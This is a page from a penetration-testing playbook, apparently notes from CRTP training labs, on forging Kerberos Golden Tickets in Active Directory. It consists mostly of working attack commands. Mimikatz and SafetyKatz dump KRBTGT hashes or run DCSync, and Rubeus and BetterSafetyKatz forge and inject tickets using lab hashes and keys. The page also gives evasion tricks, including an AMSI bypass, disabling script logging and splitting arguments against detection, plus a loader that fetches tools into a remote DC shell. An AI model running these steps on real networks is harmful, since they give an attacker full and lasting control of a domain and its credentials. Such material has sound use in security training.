PenTest Playbook
  • Welcome!
  • Web App Pentesting
    • SQL Injection
    • NoSQL Injection
    • XSS
    • CSRF
    • SSRF
    • XXE
    • IDOR
    • SSTI
    • Broken Access Control/Privilege Escalation
    • Open Redirect
    • File Inclusion
    • File Upload
    • Insecure Deserialization
      • XMLDecoder
    • LDAP Injection
    • XPath Injection
    • JWT
    • Parameter Pollution
    • Prototype Pollution
    • Race Conditions
    • CRLF Injection
    • LaTeX Injection
    • CORS Misconfiguration
    • Handy Commands & Payloads
  • Active Directory Pentest
    • Domain Enumeration
      • User Enumeration
      • Group Enumeration
      • GPO & OU Enumeration
      • ACLs
      • Trusts
      • User Hunting
    • Domain Privilege Escalation
      • Kerberoast
        • AS-REP Roast (Kerberoasting)
        • CRTP Lab 14
      • Targeted Kerberoasting
        • AS-REP Roast
        • Set SPN
      • Kerberos Delegation
        • Unconstrained Delegation
          • CRTP Lab 15
        • Constrained Delegation
          • CRTP Lab 16
        • Resource Based Constrained Delegation (RBCD)
          • CRTP Lab 17
      • Across Trusts
        • Child to Parent (Cross Domain)
          • Using Trust Tickets
            • CRTP Lab 18
          • Using KRBTGT Hash
            • CRTP Lab 19
        • Cross Forest
          • Lab 20
        • AD CS (Across Domain Trusts)
          • ESC1
            • CRTP Lab 21
        • Trust Abuse - MSSQL Servers
          • CRTP Lab 22
    • Lateral Movement
      • PowerShell Remoting
      • Extracting Creds, Hashes, Tickets
      • Over-PassTheHash
      • DCSync
    • Evasion
      • Evasion Cheetsheet
    • Persistence
      • Golden Ticket
        • CRTP Lab 8
      • Silver Ticket
        • CRTP Lab 9
      • Diamond Ticket
        • CRTP Lab 10
      • Skeleton Key
      • DSRM
        • CRTP Lab 11
      • Custom SSP
      • Using ACLs
        • AdminSDHolder
        • Rights Abuse
          • CRTP Lab 12
        • Security Descriptors
          • CRTP Lab 13
    • Tools
    • PowerShell
  • AI Security
    • LLM Security Checklist
    • GenAI Vision Security Checklist
    • Questionnaire for AI/ML/GenAI Engineering Teams
  • Network Pentesting
    • Information Gathering
    • Scanning
    • Port/Service Enumeration
      • 21 FTP
      • 22 SSH
      • 25, 465, 587 SMTP
      • 53 DNS
      • 80, 443 HTTP/s
      • 88 Kerberos
      • 135, 593 MSRPC
      • 137, 138, 139 NetBios
      • 139, 445 SMB
      • 161, 162, 10161, 10162/udp SNMP
      • 389, 636, 3268, 3269 LDAP
      • Untitled
      • Page 14
      • Page 15
      • Page 16
      • Page 17
      • Page 18
      • Page 19
      • Page 20
    • Nessus
    • Checklist
  • Mobile Pentesting
    • Android
      • Android PenTest Setup
      • Tools
    • iOS
  • DevSecOps
    • Building CI Pipeline
    • Threat Modeling
    • Secure Coding
      • Code Review Examples
        • Broken Access Control
        • Broken Authentication
        • Command Injection
        • SQLi
        • XSS
        • XXE
        • SSRF
        • SSTI
        • CSRF
        • Insecure Deserialization
        • XPath Injection
        • LDAP Injection
        • Insecure File Uploads
        • Path Traversal
        • LFI
        • RFI
        • Prototype Pollution
        • Connection String Injection
        • Sensitive Data Exposure
        • Security Misconfigurations
        • Buffer Overflow
        • Integer Overflow
        • Symlink Attack
        • Use After Free
        • Out of Bounds
      • C/C++ Secure Coding
      • Java/JS Secure Coding
      • Python Secure Coding
  • Malware Dev
    • Basics - Get detected!
    • Not so easy to stage!
    • Base64 Encode Shellcode
    • Caesar Cipher (ROT 13) Encrypt Shellcode
    • XOR Encrypt Shellcode
    • AES Encrypt Shellcode
  • Handy
    • Reverse Shells
    • Pivoting
    • File Transfers
    • Tmux
  • Wifi Pentesting
    • Monitoring
    • Cracking
  • Buffer Overflows
  • Cloud Security
    • AWS
    • GCP
    • Azure
  • Container Security
  • Todo
Powered by GitBook
On this page
  • Golden Ticket
  • Attack in Practice:
  1. Active Directory Pentest
  2. Persistence

Golden Ticket

A Golden Ticket attack consist of the creating of a legitimate Ticket Granting Ticket (TGT) that impersonates any user through the use of the NTLM hash of the krbtgt account. (Unlimited Access to AD).

PreviousPersistenceNextCRTP Lab 8

Last updated 10 months ago

Golden Ticket

  • Golden Ticket is used for persistence. Compromising a DC is a prerequisite to perform this attack.

  • Once we have admin access to DC, the KRBTGT hash is extracted to sign TGT.

  • We can forge a TGT (Golden Ticket) by using the KRBTGT hash.

  • Since the Golden Ticket is encrypted and signed with the KRBTGT hash, it is seen as legitimate by other domain controllers and services.

  • Very noisy as we are accessing DC to extract KRBTGT credentials. To avoid detection, use accounts other than administrator and ensure you check optional arguments like startoffset, etc.

To get KRBTGT hash, execute Mimikatz on DC or DA:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc 

OR 
# DC-Sync to get KRBTGT without needing code execution on target DC.
SafeyKatz.exe "lsadump::dcsync /user:dcorp-dc\krbtgt" "exit"
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:SID /aes256:KEY /startoffset:0 /ending:600 /renewmax:10080 /ptt" "exit"

Attack in Practice:

Using PowerShell Remoting and Invoke-Mimi.ps1

Start a process with DA privs in a elevated shell.

C:\Windows\System32> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\Windows\System32>. C:\AD\Tools\Invoke-Mimi.ps1

C:\Windows\System32> Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin
/domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8
/run:cmd.exe"'

As DA, we open a session as dcorp-dc, and disable script logging and AMSI.

# InviShell
C:\Windows\System32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]

# Enter DC Session
PS C:\Windows\System32> cd C:\AD\Tools
PS C:\AD\Tools> $sess = New-PSSession -ComputerName dcorp-dc
PS C:\AD\Tools> Enter-PSSession $sess

# Bypass AMSI
[dcorp-dc]: PS C:\Users\svcadmin\Documents> S`eT-It`em <AMSI Bypass snip>
[dcorp-dc]: PS C:\Users\svcadmin\Documents> exit

# Invoke-Mimi
PS C:\AD\Tools> Invoke-Command -FilePath .\Invoke-Mimi.ps1 -Session $sess
PS C:\AD\Tools> Enter-PSSession $sess

# Fetch the KRBTGT hashes
[dcorp-dc]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::lsa /patch"'

We can also run DCSync attack from the process runnning as DA:

PS C:\AD\Tools> Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Create a Golden Ticket

PS C:\AD\Tools> Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

We can now access filesystem on DC and also get a shell:

PS C:\AD\Tools> ls \\dcorp-dc\c$

Using Rubeus, SafetyKatz, or BetterSafetyKatz.exe

Open CMD and use ArgSplit to encode asktgt.

C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"

Open an elevated DA cmd by using DA Hash extracted previously:

C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

#Copy Loader.exe to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Spawn interactive shell for DC
winrs -r:dcorp-dc cmd

# Set up port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

Run SafetyKatz to dump KRBTGT hashes and fetch SID

#Encode lsadump::lsa using ArgSplit
set "z=a"
set "y=s"
set "x=l"
set "w=:"
set "v=:"
set "u=p"
set "t=m"
set "s=u"
set "r=d"
set "q=a"
set "p=s"
set "o=l"
set "Pwn=%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"

# In elevated DA cmd:
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"

Exit from mimikatz and DA shell. From Student cmd, run Rubeus to get the golden ticket. It will also output the command to forge the Golden ticket and inject it in the current process. Add /ptt at the end to inject it in the current process.

C:\AD\Tools\Loader.exe golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:33:55 AM" /minpassage:1 /logoncount:3335 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

#OR run BetterSafetyKatz.exe 
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Finally, we can use winrs to login to dcorp-dc from Student.

C:\AD\Tools>winrs -r:dcorp-dc cmd

Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator>set username
set username
USERNAME=Administrator